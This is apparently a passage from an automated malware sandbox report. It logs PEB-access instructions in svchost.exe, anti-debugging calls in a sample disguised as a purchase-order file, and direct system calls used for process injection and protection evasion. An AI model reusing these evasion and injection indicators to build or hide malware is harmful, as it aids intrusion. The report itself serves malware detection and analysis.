            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C310 mov ecx, dword ptr fs:[00000030h]2_2_0392C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]2_2_03A08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov ecx, dword ptr fs:[00000030h]2_2_03A08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]2_2_03A08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]2_2_03A08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950310 mov ecx, dword ptr fs:[00000030h]2_2_03950310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov ecx, dword ptr fs:[00000030h]2_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA352 mov eax, dword ptr fs:[00000030h]2_2_039FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D8350 mov ecx, dword ptr fs:[00000030h]2_2_039D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D437C mov eax, dword ptr fs:[00000030h]2_2_039D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0634F mov eax, dword ptr fs:[00000030h]2_2_03A0634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h]2_2_0396E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h]2_2_0396E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402A0 mov eax, dword ptr fs:[00000030h]2_2_039402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402A0 mov eax, dword ptr fs:[00000030h]2_2_039402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov ecx, dword ptr fs:[00000030h]2_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A062D6 mov eax, dword ptr fs:[00000030h]2_2_03A062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392823B mov eax, dword ptr fs:[00000030h]2_2_0392823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A250 mov eax, dword ptr fs:[00000030h]2_2_0392A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936259 mov eax, dword ptr fs:[00000030h]2_2_03936259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA250 mov eax, dword ptr fs:[00000030h]2_2_039EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA250 mov eax, dword ptr fs:[00000030h]2_2_039EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B8243 mov eax, dword ptr fs:[00000030h]2_2_039B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B8243 mov ecx, dword ptr fs:[00000030h]2_2_039B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392826B mov eax, dword ptr fs:[00000030h]2_2_0392826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0625D mov eax, dword ptr fs:[00000030h]2_2_03A0625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03970185 mov eax, dword ptr fs:[00000030h]2_2_03970185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h]2_2_039EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h]2_2_039EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h]2_2_039D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h]2_2_039D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A061E5 mov eax, dword ptr fs:[00000030h]2_2_03A061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h]2_2_039F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h]2_2_039F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039601F8 mov eax, dword ptr fs:[00000030h]2_2_039601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov ecx, dword ptr fs:[00000030h]2_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F0115 mov eax, dword ptr fs:[00000030h]2_2_039F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960124 mov eax, dword ptr fs:[00000030h]2_2_03960124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C156 mov eax, dword ptr fs:[00000030h]2_2_0392C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C8158 mov eax, dword ptr fs:[00000030h]2_2_039C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04164 mov eax, dword ptr fs:[00000030h]2_2_03A04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04164 mov eax, dword ptr fs:[00000030h]2_2_03A04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936154 mov eax, dword ptr fs:[00000030h]2_2_03936154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936154 mov eax, dword ptr fs:[00000030h]2_2_03936154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov ecx, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393208A mov eax, dword ptr fs:[00000030h]2_2_0393208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F60B8 mov eax, dword ptr fs:[00000030h]2_2_039F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F60B8 mov ecx, dword ptr fs:[00000030h]2_2_039F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039280A0 mov eax, dword ptr fs:[00000030h]2_2_039280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C80A8 mov eax, dword ptr fs:[00000030h]2_2_039C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B20DE mov eax, dword ptr fs:[00000030h]2_2_039B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C0F0 mov eax, dword ptr fs:[00000030h]2_2_0392C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039720F0 mov ecx, dword ptr fs:[00000030h]2_2_039720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0392A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039380E9 mov eax, dword ptr fs:[00000030h]2_2_039380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B60E0 mov eax, dword ptr fs:[00000030h]2_2_039B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4000 mov ecx, dword ptr fs:[00000030h]2_2_039B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6030 mov eax, dword ptr fs:[00000030h]2_2_039C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A020 mov eax, dword ptr fs:[00000030h]2_2_0392A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C020 mov eax, dword ptr fs:[00000030h]2_2_0392C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932050 mov eax, dword ptr fs:[00000030h]2_2_03932050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6050 mov eax, dword ptr fs:[00000030h]2_2_039B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395C073 mov eax, dword ptr fs:[00000030h]2_2_0395C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D678E mov eax, dword ptr fs:[00000030h]2_2_039D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039307AF mov eax, dword ptr fs:[00000030h]2_2_039307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E47A0 mov eax, dword ptr fs:[00000030h]2_2_039E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393C7C0 mov eax, dword ptr fs:[00000030h]2_2_0393C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B07C3 mov eax, dword ptr fs:[00000030h]2_2_039B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039347FB mov eax, dword ptr fs:[00000030h]2_2_039347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039347FB mov eax, dword ptr fs:[00000030h]2_2_039347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE7E1 mov eax, dword ptr fs:[00000030h]2_2_039BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930710 mov eax, dword ptr fs:[00000030h]2_2_03930710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960710 mov eax, dword ptr fs:[00000030h]2_2_03960710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C700 mov eax, dword ptr fs:[00000030h]2_2_0396C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]2_2_0396273C
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe | NtWriteVirtualMemory: Direct from: 0x77762E3C
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe | NtMapViewOfSection: Direct from: 0x77762D1C
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe | NtNotifyChangeKey: Direct from: 0x77763C2C
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe | NtCreateMutant: Direct from: 0x777635CC
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe | NtResumeThread: Direct from: 0x777636AC
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe | NtProtectVirtualMemory: Direct from: 0x77757B2E
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe | NtQuerySystemInformation: Direct from: 0x77762DFC
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe | NtAllocateVirtualMemory: Direct from: 0x77762BFC
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe | NtReadFile: Direct from: 0x77762ADC
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe | NtDelayExecution: Direct from: 0x77762DDC
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe | NtWriteVirtualMemory: Direct from: 0x7776490C
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe | NtQueryInformationProcess: Direct from: 0x77762C26
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe | NtResumeThread: Direct from: 0x77762FBC
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe | NtCreateUserProcess: Direct from: 0x7776371C
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe | NtSetInformationThread: Direct from: 0x777563F9
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe | NtAllocateVirtualMemory: Direct from: 0x77763C9C
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe | NtSetInformationThread: Direct from: 0x77762B4C
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe | NtQueryAttributesFile: Direct from: 0x77762E6C
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe | NtClose: Direct from: 0x77762B6C
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe | NtReadVirtualMemory: Direct from: 0x77762E8C
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe | NtCreateKey: Direct from: 0x77762C6C
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe | NtQuerySystemInformation: Direct from: 0x777648CC
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe | NtAllocateVirtualMemory: Direct from: 0x777648EC
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe | NtQueryVolumeInformationFile: Direct from: 0x77762F2C
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe | NtOpenSection: Direct from: 0x77762E0C
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe | NtDeviceIoControlFile: Direct from: 0x77762AEC
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe | NtAllocateVirtualMemory: Direct from: 0x77762BEC
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe | NtQueryInformationToken: Direct from: 0x77762CAC
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe | NtTerminateThread: Direct from: 0x77762FCC
